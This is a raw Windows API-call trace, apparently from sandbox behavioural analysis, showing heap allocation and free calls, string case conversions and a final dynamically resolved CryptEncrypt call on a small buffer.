RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.759] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0258.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0258.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0258.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.764] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.764] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.765] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa7a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.771] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.771] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1c18*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1c18*, pdwDataLen=0x8bef68*=0x8) returned 1 [0258.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.771] 